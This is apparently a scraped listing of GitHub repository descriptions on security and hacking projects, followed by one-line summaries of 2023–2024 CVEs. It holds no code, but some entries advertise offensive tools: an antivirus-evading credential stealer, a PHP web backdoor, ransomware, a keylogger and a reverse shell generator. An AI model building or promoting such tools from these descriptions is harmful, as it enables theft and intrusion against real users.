cyber security tools written mostly in Python from Udemy's Cyber Security course by Mashrur Hossain and Egveny Rahman
ELEC0138-Security-and-Privacy-Group-K
This is a Spring Boot-based Blog Application that allows users to perform various operations such as registering, logging in, creating, updating, and deleting posts, categories, comments, and users. The application is secured using Spring Security and JWT
Bank Management System made in C
Proof-of-concept C2 server and client with custom payload
oci_terraform_security
In this repository, I delve into the intricacies of Django middlewares, exploring their role in request/response processing and how they can be leveraged to enhance the functionality and security of Django applications.
It's a Number Lock tool
[WIP] Scripts for the game Grey Hack
This project addresses this gap by creating interactive VR modules focused on fundamental cyber security training. These modules will cover crucial topics such as password security, data encryption, Wi-Fi and network security, safe web browsing, and commo
Hack!!!!!
HackingYZ.github.io
This repository is dedicated to automating STIG compliance using Ansible. STIGs provide standardized security protocols to ensure a secure environment. By leveraging Ansible, we can streamline the process of implementing and maintaining STIG configuration
Cyber Security Blog Page
VulnersX: A powerful tool for efficiently searching and analyzing software vulnerabilities. It provides comprehensive results with both SQLite database and text file outputs, ensuring flexibility and ease of use for security professionals and developers a
AWS Certified SysOps Administrator - Associate (SOA-C02)
This project is a proof of concept using Qt/QML and Tesseract to extract text from image to fetch book dataset
This repo will host my study notes on my journey to becoming an ethical hacker.
PYTHON-HACKING-SCRIPTS
Explore hands-on labs covering ethical hacking, penetration testing, cryptography, cloud forensics, and mobile/network hacking. Enhance your cybersecurity skills with step-by-step guides and exercises.
This personal project explores cybersecurity through a Rust-built password tool, combining secure storage, generation, auditing, and cracking to identify vulnerabilities and optimize security.
datadog security
spring-security
Official GitHub repo for The Security Room
This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.
Back-end of Digital Money House App using Spring Cloud, Spring Security, Spring Data - Hibernate, Keycloak, Swagger and PostgreSQL
Repository to contain the notebooks and notes that I have taken while undertaking security courses
spring-boot-security-2024
securityApp
SecurityMicroservices
fastApi_security_challenge
web-security-scanner
Mark Jacobs
This is a MERN stack project which is done for the software security module in my university. So the primary motive is to practice best software security practices
myEShop is a simple store project with relatively high security system
Global Hack Week Challenge
Spring project using spring data with JPA and spring security
a small cli tool for file encryption, written in Rust.
A proof of concept for a new `osbuild-mpp`.
Barclays Hack-o-Hire
Scoop bucket for Penetration Testing and Cybersecurity related tools
PP_3_1_2_Boot_Security-m
security-prj-practice-front
A Whatsapp MD bot by The Infinity Hackers
Complexity Science SP24, Project 2
All things related to sp_CheckSecurity
This application has spring security configuration with JWT and setup for authentication and authorization
Guardian Secure is a web application focused on providing robust security features for user authentication and account protection. It offers secure user registration, login, and password management functionalities, ensuring the confidentiality and integri
this repo contains the files for the hacker page of the keylogger program
Nuxt API Rate Limiter / Brute Force Protection
Next-gen Security Hyperautomation Platform
Rootme: A React-based reverse shell generator. Enter an IP address and port number to generate a variety of reverse shells in multiple languages. Ideal for ethical hacking and penetration testing.
This is the repository which stores my proof of concept for the use of fully homomorphic encryption during e-voting
Documenting work during the Bio Hack Academy 2024
they are wargames that can help one learn security concepts
summit_2024_RHELevant_Security_Practices_Lab_LB1964
A repository of all projects relating to learning and practing techniques and tools used in cyber security
A proof of concept for snap configuration sharing across snaps using snapd's aspects
Rust no-BS Dead Man's Switch TUI
wi.rf.gd
This code is a web scanner tool designed to find vulnerabilities and file upload points on a website. It uses various techniques to bypass security measures and upload files in a hidden manner. In the following, the technical details of the code and the t
This project aims to deploy a security.txt and thanks.txt file under the vulnerability disclosure program started by DfE with NCSC.
A Network Intrusion Detection System (NIDS) is a cybersecurity project designed to monitor and analyze network traffic for signs of malicious activities or security threats.
ZySec AI: Empowering Security with AI for AI
Hackable charting lib for traders. You can draw literally ANYTHING on top of candlestick charts
securitylab
Another proof of concept applying knowledge in rust through the rust study group. I'm following the same concept as the Polkadot SDK.
WARNING: This is a proof-of-concept idea - it might be removed again
:honey_pot: An high-interaction extensible honeypot deployment framework, with out-of-box adb protocol support. :honeybee:
This repository contains useful resources for preparing and obtaining the CCSE (Certified Container Security Expert) certification of practical devsecops organizations.
自用的Spring boot3脚手架,整合了security+jjwt鉴权、Nacos注册中心、okhttp、log4j日志、mysql、redis、ElasticSearch,用于微服务项目开发
Created for Hack.Diversity Learning Lab on working with Large Language Models
InstructLab Community wide collaboration space including contributing, security, code of conduct, etc
Config files for my GitHub profile.
security script
In this project, you'll play mad scientist and make a functioning clone of Hacker News
SWEN3920
security-project
Daily/Weekly deals for everyone in one place!
Computer Networks and Security
🚩 Easy guides & answers for CTFs 🧩 | 🌐 Diverse challenges covered | 🛡️ Ideal for cybersecurity learning | 🎯 Real puzzles & tasks | 👨‍💻 Boost hacking skills!
Spring_Security_Practice
Software and System Security
Proof of concept repo for using NuGet to break up our monorepo.
SploitScan is a sophisticated cybersecurity utility designed to provide detailed information on vulnerabilities and associated proof-of-concept (PoC) exploits.
Inpenetrable encryption combination[AES-256|reverse-bits|add-bits|byte-to-decimal]
Branta Core for Windows
A web frontend for Vaulted-api collaborative password manager API
Tutorials to help you get started with ChromaDB. Chroma has built-in functionality to embed text and images so you can build out your proof-of-concepts on a vector database quickly. Associated videos:
Hack source code linters authored with portable-hack-ast
A collaborative password manager NodeJS API
This thing will find some goodies in your Web App Hacking Adventures.
Online Security in Australia
DynamoWave Chat is a serverless chat appliction utilising AWS Lambda, DynamoDB, and WebSocket API for real-time communication. This architecture focuses on System Design Principles, ensuring high availability, scalability, security, cost-efficiency, and o
Query the Hack AST in a light and portable manner
Set of tools to assess and improve LLM security.
An opinioniated NixOS module to improve security.
A RAG proof-of-concept to query the scikit-learn documentation
Security Reviews and Findings by McGrath Coutinho
Eth Lisbon Hack 2023
django-jwt-auth is an application for authenticating users with jwt in Django with very high security and practical features
Proof of concept files
Python based program that runs multiple security test against a chosen domain
Web, Mobile, Cloud, AI, Embedded, Security, Blockchain, Quantum etc
آموزش رایگان و دائمی فعال‌سازی آنتن در آیفون ۱۴ و ۱۵ بدون ردگیری و بسته شدن با دو روش مختلف، به همراه سورس کد و فایل ساخت UUID یکتا
Security-modelling-in-the-metropolitan-area-of-Sao-Paulo
OCP-Security-SAFE
TU Dublin - Cyber Security
HealthEdge is a web application designed to revolutionize healthcare facility management, offering features for easy appointment bookings and comprehensive patient care. It empowers doctors with schedule management tools and monitoring capabilities, ensur
🌟[NEW] Recive log by Telegram ✅ [0/70] FUD Stealer can bypass all antivirus (Our Grabber can grabs: Wallets, Passwords, Credit Card, Cookies, Autofills, All Discord Token and info, Telegram, Twitter, TikTok, Twitch, Spotify, Riot Games, Reddit, Roblox, an
A proof of concept mixing Lit and HTMX using the power of Bun under the hood
Fresh-Cart is an E-Commerce shopping Web App SPA CRUD system, integrating Redux, useQuery, and React Context for efficient state management. Axios for smooth communication, while features like user authentication and React Router Protection enhance securi
Proof-of-concept `record` type for Python
The OTP-Manager is an Flask-based solution designed for the secure management of one-time passwords (OTPs), leveraging the TOTP protocol for enhanced security. With features including user management, customization options, and robust OTP and company mana
Path to learn about the red team / ethical hacking #ofensive
Repo de Writeups de Hack The Box. Comparto metodologías, pasos de explotación y soluciones para desafíos en máquinas de HTB. Mi objetivo al compartir estos writeups es contribuir al aprendizaje colectivo y a la comunidad de ciberseguridad.
Demonstrate technical aptitude and cleverness, and/or to commemorate popular culture and historical topics
This repository stores my solutions to various problems on Hackerrank, LeetCode & Hack the Box
Hack Chat and related chatrooms history book.
A personal cheatsheet for my daily work/labs
Mantis is a security framework that automates the workflow of discovery, reconnaissance, and vulnerability scanning.
Spring-Security
Includes all d3m0n_os versions for d3m0n cell phones
Underground store is a store for Rom Hack, Mods and Fan Game written in C#
Security Improvement of Cloud Data Using Hybrid Cryptography and Stegnography
:computer: :key: ssh-agent for TPMs
Fork of Tecnativa/docker-socket-proxy intended to run without a network stack for added security
Files history firebase takeover hacker ethical
bash and python script demos from the Linux Basics For Hackers book
Development and demonstration of a proof-of-concept for the integration of programming frameworks for high performance computing into a container-based workflow orchestrator.
A high performance Rust web server that supports multithreads and async. A playground for testing and improving your hacking skills while learning about AppSec and how to build secure software.
Integrate hmac authentication seamlessly into your .NET applications, fortifying security measures and ensuring robust authentication protocols.
Assure DeFi is The Verification Gold Standard™ serving the crypto space since early 2021. As a leading security company for Web3, Assure DeFi has pioneered the process for founder verifications (project KYC) and is proud to provide world-class code develo
A proof-of-concept tool for extracting email addresses from WordPress sites by abusing misfeatures in the REST API.
Proof of concept for federated training of AI for video games
Terraform module to configure Microsoft Defender for Cloud (aka Security Center) on Azure
common wrapper for securities API
Static Application Security Testing using Semgrep
My personally curated repository dedicated to provide useful tools, methods, commands, websites, etc. regarding all things cyber.
Moving computation and data processing services to the edge, far from secured data centers, leaves systems exposed to new threats. Edge Computing requires a new generation of intelligent security mechanisms to be deployed along with edge applications, imp
This is a proof of concept AEM Franklin implementation for https://jade.asprey.com/
Security Disclosures
Scout is an extensible open-source tool intended to assist ink! smart contract developers and auditors detect common security issues and deviations from best practices.
一款足够简单、足够好用、足够强的免费 WAF。基于业界领先的语义引擎检测技术,作为反向代理接入,保护你的网站不受黑客攻击。 A free WAF that is sufficiently simple, effective, and powerful. Utilizing industry-leading semantic engine detection technology, it operates as a reverse proxy to protect your website from hac
Proof of Concept for IP Version 6 class
A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting
Supercharge your network security with DNS blocklists from The Firebog! Daily updates shield you from ads, trackers, malware, phishing, crypto, and NSFW content! Works with AdGuard Home, Pi-Hole, and adblock browser extensions for a safer, ad-free world w
My notes about IT topics (security, low-level, os-dev, Linux, Windows etc).
Proof of concept implementation of the IC HTTP Gateway Protocol that enables end-to-end secure connections with dApps being served from the internet computer.
This repository is dedicated to sharing notes and resources related to blue team security, which focuses on detecting and preventing cyber attacks. Here, you'll find information on various aspects of blue team security, including email analysis, file anal
This repository contains notes and resources related to ethical hacking. Here, you'll find a wealth of information on various aspects of hacking, including information gathering, scanning and enumeration, web hacking, exploitation, and windows/linux hacki
Proactive, Open source API security → API discovery, Testing in CI/CD, Test Library with 150+ Tests, Add custom tests, Sensitive data exposure
Cyber Security Awareness Framework (CSAF)
MevSec Blog to share security related stuffs.
平台:Windows/Mac/Linux。脚本语言:多种、不限;我流,按需编写。涉及:桌面基线排查、软件激活破解、免杀及特权执行、渗透式支援固件识别读写、主机账户密码空值检测、Wi-Fi密码扫描、云主机终端安全加固、主机系统日志分析、自然语言处理、人文社科信息数据分析等。
open source security auditing tools for games on android and linux. Containing memory scanner/editor, apk GUI, value freezer, android non root support and many more!
Polyglot TDD Workflow Proof-of-Concept
Hack Sprint Project
Proof-of-concept for HTML streaming in Spring using FreeMarker
Ataque WPS transparente con rogue AP
A security layer for Git repositories
SecurityProjects
A Memory Editor & Scripting Platform for Hacking Games and Other Software.
Tencent Kona SM Suite contains a set of Java security providers, which support algorithms SM2, SM3 and SM4, and protocols TLCP/GMSSL, TLS 1.3 (with RFC 8998) and TLS 1.2.
key master storage
Hands-on work and practice labs for DevOps (or SRE) on the public Cloud with some necessary security considerations
Directory-based Java keystore
Windows11 Penetration Suite Toolkit 一个开箱即用的windows渗透测试环境
Utility that allows generating and manipulating Tink keysets
Google Cloud KMS extension for Tink C++
A self-hosted platform explicitly designed for indie hackers or teams. Providing BaaS and financial services.
test spring security
a weak weak pass tool
sammcj
Installation script for Codename SCNR.
Visual Studio Code extension that allows you to perform a web search for the selected text using your favorite search engines (add as many as you like, editable in extension settings). I wrote this as a proof-of-concept idea when teaching myself TypeScrip
A recursive internet scanner for hackers.
Hack produced at the MLH Royal Hackaway 2022 @rhul-compsoc
Just-In-Time Access is a self-service web application that lets you manage just-in-time privileged access to Google Cloud projects. JIT Access runs on App Engine and Cloud Run.
Biweekly hacks with our lunchtime coding group
Early proof of concept work for RFC 786
Gatsby proof of concept for multi-agency GTFS site
End-to-end proof of concept showing core MLOps practices to develop, deploy and monitor a machine learning model for online inference scenarios using Databricks and Kubernetes on Microsoft Azure.
A standalone exporter for vulnerability reports and other CRs created by Trivy Operator (formerly Starboard).
Role/Attribute mandatory access control
详细的C/C++编程规范指南,由360质量工程部编著,适用于桌面、服务端及嵌入式软件系统。
Repo for TMGC, an in-dev FE8 hack.
VAITP - Vulnerability Attack and Injection Tool for Python
ultimate-cube,重构优化中......
Dixmont Jackson extensions
show images on an index page, plus some style hacking here and there
Sensible Hacker Defaults for Linux
ansible-role to install and setup auditd, fail2ban and snmp.
Hardware Proof of Concept
Official IVPN Desktop app
Common Security Advisory Framework (CSAF) Verification, Validation, and Application Programming Interface (API).
This repo contains some solved python hacker codes
The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files, tokens and commands through port 80's POST/GET method, users can access a range of activities such as downloading and editing files. It
software-security
this repo for cyberSecurity and ethical hacking books,projects,articles etc
Audit configurations for RHEL8 CIS - utilising goss
Various Scripts and Tools for Microsoft Technologies Professionals
The complete history of #1 posts on hacker news, frequently updated ☕️
AzureSecurityCenterOSRemediations
Clojure REPL-based WM hacking on linux and osx
CodeQL Security Queries
A free, custom, open source hacked client for Minecraft 1.20.4 using Fabric
Cross-domain Language-extensions for SecUre Refactoring and Execution
A showcase of our development and proof of concept research work at the Arizona Institutes for Resilience
Helm chart for Trend Micro Cloud One Container Security
Trend Micro Cloud One File Storage Security plugins reference code.
Secures REST APIs with Spring Security and JWT Token-based Authentication powered by Spring Reactive stack
Composite data masking utility
A collection of GCP IAM privilege escalation methods documented by the Rhino Security Labs team.
Home of the JupiterOne SDK
My personal hacker space written via Emacs' OrgMode, built via Astro
malCure Security Suite for WordPress Security
Jwt Manager. Set of components to deal with Jwt Stuff. Automate your key rotating, add support for jwks_uri. Store your cryptography keys in a secure place.
butterfly is a cryptographic ransomware written in C++
❌ Revoke or update your token approvals
安定宝协议恒博实现
The goal of this repository is to create a tool which users can install as a service and with that, have their phishing emails automatically sent to whatever user map them to. I will only make an official release of this when I'm absolutely sure of a coup
Terraform module for Azure Network Security Group
Python interface for ADT Pulse security systems
Bisect nix builds. Status: alpha/proof of concept. You'll probably have to dig into the implementation if you want to use it. Built for personal use, lightly maintained. PRs welcome. Issues welcome, but I make no promises regarding responses or fix
Host and manage multiple Juice Shop instances for security trainings and Capture The Flags
ffffffff0x 团队维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Common CTF Challenges is a collection of tools and resources to help individuals improve their Capture the Flag (CTF) skills. Our tools cover a wide range of challenges, from cryptography to reverse engineering.
unofficial Japanese translation of OWASP Application Security Verification Standard.
A proof of concept using Kafka as a persistent source of configuration property updates.
🐊 Gatekeeper - Policy Controller for Kubernetes
Free and open-source game hack for Counter-Strike 2, written in modern C++. For Windows and Linux.
Kubernetes object analysis with recommendations for improved reliability and security. kube-score actively prevents downtime and bugs in your Kubernetes YAML and Charts. Static code analysis for Kubernetes.
Security-enhanced XML utilities
Platform-Agnostic Security Tokens
Emulator of homebrew and hacked games for arcade hardware
Python-based Comprehensive Network Packet Analysis Library
Python library for AntiCaptcha.
Utility provider that works with Transport Layer Security keys and certificates. It provides resources that allow private keys, certificates and certficate requests to be created as part of a Terraform deployment.
This project is intended to constantly renew a Vault token derived from a role id
The security tool(project) Set from github。github安全项目工具集合
Berlin Hack & Tell
SMTP (email) server with a focus on simplicity, security, and ease of operation [mirror]
🔧 .files — sensible developers (hackers) defaults for Linux
⚡️ Docker official image for Wallarm Node. API security platform agent.
horrible dotfiles, full of hacks
Private Clojure hacks
LibreAuth is a collection of tools for user authentication.
SSH Access Manager
OAuth 2.0 social authentication providers for ASP.NET Core
Hack to get CommonJS into ES6 import statements
An Information Security Reference That Doesn't Suck; https://rmusser.net/git/admin-2/Infosec_Reference for non-MS Git hosted version.
NHS Hack Day website
:star2: Website for the Chi Hack Night.
Beangle Security Framework
OpenSIPS is a GPL implementation of a multi-functionality SIP Server that targets to deliver a high-level technical solution (performance, security and quality) to be used in professional SIP server platforms.
Damn Vulnerable Web Application (DVWA)
Repo for reusable non-project specific code. Stuff like udev rules, camera hacks, etc. Got a good xbee interface library? Some slick opencv frame grabbing routines? ROS snippets? Great! Put em' here.
MISP (core software) - Open Source Threat Intelligence and Sharing Platform
CVE-2024-1057 -- The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +10 Modules – All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wishsuite_button' shortcode in all versions up to, an
CVE-2024-1730 -- The Prime Slider – Addons For Elementor (Revolution of a slider, Hero Slider, Media Slider, Drag Drop Slider, Video Slider, Product Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via urls in link fields, images
CVE-2024-4014 -- The hCaptcha for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf7-hcaptcha shortcode in all versions up to, and including, 4.0.0 due to insufficient input sanitization and output escaping on user supplied at
CVE-2022-40745 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to obtain sensitive information due to weaker than expected security. IBM X-Force ID: 236452.
CVE-2023-22869 -- IBM Aspera Faspex 5.0.0 through 5.0.7 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 244119.
CVE-2023-27279 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a user to cause a denial of service due to missing API rate limiting. IBM X-Force ID: 248533.
CVE-2023-37396 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to obtain sensitive information due to improper encryption of certain data. IBM X-Force ID: 259671.
CVE-2023-37397 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to obtain or modify sensitive information due to improper encryption of certain data. IBM X-Force ID: 259672.
CVE-2023-37397 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to obtain or modify sensitive information due to improper encryption of certain data. IBM X-Force ID: 259672.
CVE-2023-37400 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to escalate their privileges due to insecure credential storage. IBM X-Force ID: 259677.
CVE-2023-37400 -- IBM Aspera Faspex 5.0.0 through 5.0.7 could allow a local user to escalate their privileges due to insecure credential storage. IBM X-Force ID: 259677.
CVE-2023-47435 -- An issue in the verifyPassword function of hexo-theme-matery v2.0.0 allows attackers to bypass authentication and access password protected pages.
CVE-2023-49275 -- Wazuh is a free and open source platform used for threat prevention, detection, and response. A NULL pointer dereference was detected during fuzzing of the analysis engine, allowing malicious clients to DoS the analysis engine. The bug occurs when `analys
CVE-2023-49501 -- Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the config_eq_output function in the libavfilter/asrc_afirsrc.c:495:30 component.
CVE-2023-49502 -- Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the ff_bwdif_filter_intra_c function in the libavfilter/bwdifdsp.c:125:5 component.
CVE-2023-49963 -- DYMO LabelWriter Print Server through 2.366 contains a backdoor hard-coded password that could allow an attacker to take control.
CVE-2023-50007 -- Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via theav_samples_set_silence function in thelibavutil/samplefmt.c:260:9 component.
CVE-2023-50008 -- Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the av_malloc function in libavutil/mem.c:105:9 component.
CVE-2023-50009 -- Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the ff_gaussian_blur_8 function in libavfilter/edge_template.c:116:5 component.
CVE-2023-50010 -- Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the set_encoder_id function in /fftools/ffmpeg_enc.c component.
CVE-2023-50260 -- Wazuh is a free and open source platform used for threat prevention, detection, and response. A wrong validation in the `host_deny` script allows to write any string in the `hosts.deny` file, which can end in an arbitrary command execution on the target s
CVE-2023-51791 -- Buffer Overflow vulenrability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavcodec/jpegxl_parser.c in gen_alias_map.
CVE-2023-51792 -- Buffer Overflow vulnerability in libde265 v1.0.12 allows a local attacker to cause a denial of service via the allocation size exceeding the maximum supported size of 0x10000000000.
CVE-2023-51793 -- Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavutil/imgutils.c:353:9 in image_copy_plane.
CVE-2023-51795 -- Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavfilter/avf_showspectrum.c:1789:52 component in showspectrumpic_request_frame
CVE-2023-51796 -- Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavfilter/f_reverse.c:269:26 in areverse_request_frame.
CVE-2023-51797 -- Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavfilter/avf_showwaves.c:722:24 in showwaves_filter_frame
CVE-2023-51798 -- Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via a floating point exception (FPE) error at libavfilter/vf_minterpolate.c:1078:60 in interpolate.
CVE-2024-0671 -- Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory proc
CVE-2024-1065 -- Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to
CVE-2024-1480 -- Unitronics Vision Standard line of controllers allow the Information Mode password to be retrieved without authentication.
CVE-2024-1681 -- corydolphin/flask-cors is vulnerable to log injection when the log level is set to debug. An attacker can inject fake log entries into the log file by sending a specially crafted GET request containing a CRLF sequence in the request path. This vulnerabili
CVE-2024-22061 -- A Heap Overflow vulnerability in WLInfoRailService component of Ivanti Avalanche before 6.4.3 allows a remote unauthenticated attacker to execute arbitrary commands
CVE-2024-22640 -- TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.
CVE-2024-22905 -- Buffer Overflow vulnerability in ARM mbed-os v.6.17.0 allows a remote attacker to execute arbitrary code via a crafted script to the hciTrSerialRxIncoming function.
CVE-2024-23530 -- An out-of-bounds read vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3, in certain conditions can allow an unauthenticated remote attacker to read sensitive information in memory.
CVE-2024-23531 -- An Integer Overflow vulnerability in WLInfoRailService component of Ivanti Avalanche before 6.4.3 allows an unauthenticated remote attacker to perform denial of service attacks. In certain rare conditions this could also lead to reading content from memor
CVE-2024-23532 -- An out-of-bounds Read vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows an authenticated remote attacker to perform denial of service attacks. In certain conditions this could also lead to remote code execution.
CVE-2024-23533 -- An out-of-bounds read vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3, in certain conditions can allow an authenticated remote attacker to read sensitive information in memory.
CVE-2024-23534 -- An Unrestricted File-upload vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to execute arbitrary commands as SYSTEM.
CVE-2024-2440 -- A race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on a detached repository by making a GraphQL mutation to alter repository permissions while the repository is detached. This vulnerability affected all versions
CVE-2024-24992 -- A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to execute arbitrary commands as SYSTEM.
CVE-2024-24995 -- A Race Condition (TOCTOU) vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to execute arbitrary commands as SYSTEM.
CVE-2024-24996 -- A Heap overflow vulnerability in WLInfoRailService component of Ivanti Avalanche before 6.4.3 allows an unauthenticated remote attacker to execute arbitrary commands.
CVE-2024-2761 -- The Genesis Blocks WordPress plugin before 3.1.3 does not properly escape data input provided to some of its blocks, allowing using with at least contributor privileges to conduct Stored XSS attacks.
CVE-2024-27752 -- Cross Site Scripting vulnerability in CSZ CMS v.1.3.0 allows a remote attacker to execute arbitrary code via the Default Keyword field in the settings function.
CVE-2024-27975 -- An Use-after-free vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to execute arbitrary commands as SYSTEM.
CVE-2024-27976 -- A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to execute arbitrary commands as SYSTEM.
CVE-2024-27977 -- A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to delete arbitrary files, thereby leading to Denial-of-Service.
CVE-2024-27978 -- A Null Pointer Dereference vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows an authenticated remote attacker to perform denial of service attacks.
CVE-2024-27984 -- A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to delete specific type of files and/or cause denial of service.
CVE-2024-29028 -- memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /o/get/httpmeta that allows unauthenticated users to enumerate the internal network and receive limited html values in json form.
CVE-2024-29028 -- memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /o/get/httpmeta that allows unauthenticated users to enumerate the internal network and receive limited html values in json form. This vulnerab
CVE-2024-29029 -- memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /o/get/image that allows unauthenticated users to enumerate the internal network and retrieve images. The response from the image request is th
CVE-2024-29030 -- memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /api/resource that allows authenticated users to enumerate the internal network.
CVE-2024-29183 -- OpenRASP is a RASP solution that directly integrates its protection engine into the application server by instrumentation. There exists a reflected XSS in the /login page due to a reflection of the redirect parameter. This allows an attacker to execute ar
CVE-2024-29204 -- A Heap Overflow vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows a remote unauthenticated attacker to execute arbitrary commands
CVE-2024-29957 -- When Brocade SANnav before v2.3.1 and v2.3.0a servers are configured in Disaster Recovery mode, the encryption key is stored in the DR log files. This could provide attackers with an additional, less-protected path to acquiring the encryption key.
CVE-2024-29958 -- A vulnerability in Brocade SANnav before v2.3.1 and v2.3.0a prints the encryption key in the console when a privileged user executes the script to replace the Brocade SANnav Management Portal standby node. This could provide attackers an additional, less
CVE-2024-29959 -- A vulnerability in Brocade SANnav before v2.3.1 and v2.3.0a prints Brocade Fabric OS switch encrypted passwords in the Brocade SANnav Standby node's support save.
CVE-2024-29960 -- In the Brocade SANnav server versions before v2.3.1 and v2.3.0a, the SSH keys inside the OVA image are hardcoded and identical in the VM every time SANnav is installed. Any Brocade SANnav VM based on the official OVA images is vulnerable to MITM over SSH.
CVE-2024-29961 -- A vulnerability affects Brocade SANnav before v2.3.1 and v2.3.0a. It allows a Brocade SANnav service to send ping commands in the background at regular intervals to gridgain.com to check if updates are available for the Component. This could make an unaut
CVE-2024-29962 -- Brocade SANnav OVA before v2.3.1 and v2.3.0a have an insecure file permission setting that makes files world-readable. This could allow a local user without the required privileges to access sensitive information or a Java binary.
CVE-2024-29963 -- Brocade SANnav OVA before v2.3.1, and v2.3.0a, contain hardcoded keys used by Docker to reach remote registries over TLS. TLS connections with an exposed key allow an attacker to MITM the traffic.
CVE-2024-29964 -- Docker instances in Brocade SANnav before v2.3.1 and v2.3.0a have an insecure architecture and configuration that leads to multiple vulnerabilities. Docker daemons are exposed to the WAN interface, and other vulnerabilities allow total control over the Ov
CVE-2024-29966 -- Brocade SANnav OVA before v2.3.1 and v2.3.0a contain hard-coded credentials in the documentation that appear as the appliance's root password. The vulnerability could allow an unauthenticated attacker full access to the Brocade SANnav appliance.
CVE-2024-29967 -- In Brocade SANnav before Brocade SANnav v2.31 and v2.3.0a, it was observed that Docker instances inside the appliance have insecure mount points, allowing reading and writing access to sensitive files. The vulnerability could allow a sudo privileged user
CVE-2024-29968 -- An information disclosure vulnerability exists in Brocade SANnav before v2.3.1 and v2.3.0a when Brocade SANnav instances are configured in disaster recovery mode. SQL Table names, column names, and SQL queries are collected in DR standby Supportsave. This
CVE-2024-29969 -- When a Brocade SANnav installation is upgraded from Brocade SANnav v2.2.2 to Brocade SANnav 2.3.0, TLS/SSL weak message authentication code ciphers are added by default for port 18082.
CVE-2024-30938 -- SQL Injection vulnerability in SEMCMS v.4.8 allows a remote attacker to obtain sensitive information via the ID parameter in the SEMCMS_User.php component.
CVE-2024-30974 -- SQL Injection vulnerability in autoexpress v.1.3.0 allows attackers to run arbitrary SQL commands via the carId parameter.
CVE-2024-31450 -- Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server. The Owncast application exposes an administrator API at the URL /api/admin. The emoji/delete endpoint of said API allows administrators to delete cust
CVE-2024-31546 -- Computer Laboratory Management System v1.0 is vulnerable to SQL Injection via the "id" parameter of /admin/damage/view_damage.php.
CVE-2024-31547 -- Computer Laboratory Management System v1.0 is vulnerable to SQL Injection via the "id" parameter of /admin/item/view_item.php.
CVE-2024-31552 -- CuteHttpFileServer v.3.1 version has an arbitrary file download vulnerability, which allows attackers to download arbitrary files on the server and obtain sensitive information.
CVE-2024-31584 -- Pytorch before v2.2.0 has an Out-of-bounds Read vulnerability via the component torch/csrc/jit/mobile/flatbuffer_loader.cpp.
CVE-2024-31587 -- SecuSTATION Camera V2.5.5.3116-S50-SMA-B20160811A and lower allows an unauthenticated attacker to download device configuration files via a crafted request.
